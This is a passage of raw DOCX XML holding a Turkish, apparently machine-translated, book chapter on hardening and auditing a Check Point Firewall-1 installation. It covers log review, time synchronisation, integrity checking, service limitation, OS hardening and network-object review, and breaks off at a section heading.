      <w:r w:rsidRPr="00BB3C5D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Gereksiz Sistem Bileşenlerini Çıkarın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:t>Derleyiciler, hata ayıklayıcılar, güvenlik araçları vb. Gibi yazılımlar güvenlik duvarından kaldırılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Yeterli Yedek Güç Kaynakları.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:t>Güvenlik duvarında bir UPS yoksa, elektrik kesin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tisi durumunda güvenlik tamamen </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2818">
        <w:t>uygulanmayacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Günlük İncelemesi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:t>Hem güvenlik duvarı hem de ağ işletim sisteminin günlükleri gözden geçirilmeli ve analiz edilmelidir. Tüm olaylar, hata ayıklama ve adli analiz için kullanılabilecek günlüklere göre izlenebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXHIBIT 41.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN taşkın korumasını ayarlama.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="100057EC" wp14:editId="7839A28B">
            <wp:extent cx="3933825" cy="4676775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4104" name="Resim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4676775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2175"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>İdeal olarak, günlükler uzaktaki bir günlük ana bilgisayarına veya ayrı bir disk bölümüne yazılmalıdır. Bir saldırı durumunda, Günlükler, olayın birkaç yönünü izlemek için kritik belgeler sağlayabilir. Bu bilgiler, sömürülen delikleri açmak, saldırının boyutunu keşfetmek, bir saldırının belgelenmiş kanıtını sağlamak ve hatta saldırının kaynağını izlemek için kullanılabilir. Bir saldırganın yapacağı ilk şey, günlük dosyalarını değiştirerek veya yok ederek izlerini örtmektir. Bu günlük dosyalarının imha edilmesi durumunda, olayı takip etmek için yedeklemeler gerekecektir. Bu nedenle, sık yedeklemeler zorunludur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2175"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Zaman Senkronizasyonu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Zaman senkronizasyonu iki amaca hizmet eder: zamana duyarlı olayların doğru şekilde yürütülmesini sağlamak. Zaman ve bu farklı günlük dosyaları ilişkilendirilebilir. Yanlış bir zamana atıfta bulunan günlükler, mahkemede kanıt olarak potansiyel olarak dışlanabilir ve bu, bir saldırganın kovuşturma çabalarını engelleyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ağ Zaman Protokolü (NTP) RFC 1305, ana bilgisayarları senkronize etmek için yaygın olarak kullanılır. Ortamlar için daha yüksek dereceli ve denetlenebilir bir zaman senkronizasyonu yöntemi gerektiriyorsa, Sertifikalı Zaman'dan (www.certifiedtime.com) gelen zaman senkronizasyon teklifleri araştırılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bütünlük kontrolü</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2818">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bütünlük denetimi, dosya sistemindeki bir şey olduğunda sistem yöneticisine bildirimde bulunma yöntemidir. kritik bir dosyaya değiştirildi. En çok bilinen ve konuşlandırılmış bütünlük kontrolü uygulaması Tripwire (Www.tripwire.com).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hizmet Miktarını ve Protokolleri sınırlayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bir güvenlik duvarında, güvenlik duvarı tarafından kesinlikle gerekmeyen bir şey yüklü veya çalışıyor olmalıdır. Gereksiz protokoller gereksiz iletişim bağlantılarını açar. Hangi servislerin açık olduğunu görmek için port taraması kullanılabilir. Çok fazla hizmet güvenlik duvarının etkinliğini engelleyebilir, ancak her hizmete yetki verilmelidir; değilse, devre dışı bırakılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Tehlikeli bileşenler ve hizmetler şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:t>X veya GUI ile ilgili paketler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:t>NIS / NFS / RPC ile ilgili yazılım</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:t>Derleyiciler, Perl, TCL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA2818">
        <w:t>Web sunucusu, yönetim yazılımı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Masaüstü uygulamaları yazılımı (ör. Microsoft Office, Lotus Notes, tarayıcılar, vb.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bir NT güvenlik duvarında, yalnızca aşağıdaki hizmetler ve protokoller etkinleştirilmelidir:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>• TCP/IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>• Firewall-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>• Protected Storage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>• UPS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>• RPC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>• Scheduler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>• Event log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>• Plug-and-Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>• NTLM Security Support provider</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE6893">
        <w:t>Başka bir işlevselliğe ihtiyaç duyuyorsanız, bunları yalnızca gerektiği kadar ekleyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE6893">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>İşletim Sistemini Sertleştirin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE6893">
        <w:t>Temel ağ işletim sistemindeki herhangi bir zayıflık veya yanlış yapılandırma, Firewall-1'i azaltacaktır. Güvenlik duvarının, güvenlik kalesi olması için bir ana sunucu olarak korunması gerekir. Güvenlik duvarı hiçbir zaman genel amaçlı bir bilgi işlem aygıtı olarak değerlendirilmemelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bir işletim sisteminin nasıl sertleştirileceğine ilişkin mükemmel belgeler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Armoring Solaris, www.enteract.com/~lspitz/armoring.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Armoring Linux , www.enteract.com/~lspitz/linux.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Armoring NT , www.enteract.com/~lspitz/nt.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Önceden sertleştirilmiş bir cihaza ihtiyaç duyanlar Nokia güvenlik duvarı cihazını dikkate almalıdır (www.nokia.com/securitysolutions / ağ / firewall.html). Nokia güvenlik duvarı, Firewall ile birlikte </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>gelen bir donanım çözümüdür.  Güvenlik duvarı işlevselliği için sertleştirilmiş ve optimize edilmiş IPSO işletim sisteminde çalışır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00521483" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE6893">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Firewall-1 Özellikleri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00521483">
        <w:t>EXHIBIT 41.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Güvenlik Politikaları sekmesini gösterir. Biri gerekli olmayan Kabul kutularının işaretini kaldırmalıdır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="561D95F9" wp14:editId="480F4574">
            <wp:extent cx="3905250" cy="4629150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4105" name="Resim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250" cy="4629150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE6893">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SERGİ 41.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Güvenlik Politikası sekmesi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ICMP. Genel olarak, bir kişi bu özelliği devre dışı bırakabilir, ancak Checkpoint’in 4.0’da ICMP için Durumlu Denetimi’nden yararlanmak için etkin bırakması gerekebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bölge aktarımı. Çoğu site, kullanıcıların DNS yüklemeleri gerçekleştirmesine izin vermez. Aynısı RIP ve DNS arama seçenekleri için de geçerlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE6893" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE6893">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Firewall-1 Ağ Nesneleri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Güvenlik Duvarı-1 incelemesinin merkezi bir yönü, tanımlanmış ağ nesnelerinin hepsinin analizini içerir. Güvenlik duvarı-1 ağ nesneleri, güvenlik politikasının bir parçası olarak gruplandırılmış mantıksal varlıklardır. Örneğin, bir grup Web sunucusu, kuralın uygulandığı basit bir ağ nesnesi olabilir. Her ağ nesnesinin, ağ adresi, alt ağ maskesi vb. Gibi bir dizi özniteliği vardır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bir ağ nesnesinin parçası olabilecek varlık örnekleri şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ağlar ve alt ağlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sunucular</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Yönlendiriciler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Anahtarlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ana bilgisayarlar ve ağ geçidi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>İnternet alanları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Yukarıdakilerin grupları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güvenlik duvarı-1, kaynak ve hedef alanlarda ağ nesnelerinin oluşturulmasına izin verir. Bu ağ nesneleri, tek bir cihazdan tüm ağlara kadar her yerde bulunabilir ve binlerce cihaz referans verebilir. İkincisi, bir Firewall-1 güvenlik duvarının güvenlik yapılandırmasını ve güvenlik seviyesini değerlendirmeye çalışırken önemli bir engel oluşturur. Kritik sorun nasıl belirlenir çok sayıda nesne içerdiğinde ağ nesnesinin güvenliğinin altında.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00294ECA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294ECA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Güvenlik Duvarı-1'deki aygıtları yönetmeye yönelik bu nesne yönelimli yaklaşım, güvenlik duvarı yöneticisinin yönlendiricileri veya başka bir aygıtı ağ nesnesi olarak tanımlamasını ve ardından bu nesneleri güvenlik duvarı güvenlik ilkesi kuralları dahilinde kullanmasını sağlar. Ağ nesnelerinin temel kullanımları büyük bir referansta verimlilik içindir ağ aygıtı miktarı. Bu, ana bilgisayar adı, IP adresi gibi şeyleri hatırlama gereğini ortadan kaldırır konum, vb. Bu, ana bilgisayar adı, IP adresi, konum vb. Gibi şeyleri hatırlama gereksinimini ortadan kaldırır. Ağ nesneleri, bu tür nesneleri kullanarak önemli bir kullanım kolaylığı ve zaman tasarrufu sağlarken, bir kuruluşun, tümünün kendi kendine güvenip güvenmediğini belirlemesi gerekir. nesnede bulunan cihazların listesi. Sergi 41.5, mevcut nesnelerden bazılarını gösteren Ağ Nesneleri kutusunu gösterir. Exhibit 41.6, grupta çok sayıda iş istasyonu bulunan bir Ağ Nesnesinin bir örneğini gösterir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00294ECA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294ECA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Belirtildiği gibi, ağ nesnelerinin bu şekilde kullanılması idari açıdan zaman kazandırır; ancak güvenlik açısından, ağ nesnesiyle ilişkili olan yerleşik güvenlerin, bu ağ nesnesindeki her varlık için otomatik olarak oluşturulmasıyla ilgili bir sorun vardır.  Bu büyük olması nedeniyle ağlarda, ağ nesnesinde tanımlanan her bir bireyi incelemek zaman alıcıdır. Böyle bir konfigürasyonun getirdiği zorluk, güvenlik duvarı kuralının sunduğu korumayı hassasiyet ve doğrulukla incelemek için ağ nesnesindeki her cihazı kontrol etmenin gerekli olduğu anlamına gelir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C4B19">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Adım 5: Güvenlik Duvarı-1 Kural Tabanını Gözden Geçirin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003C4B19">
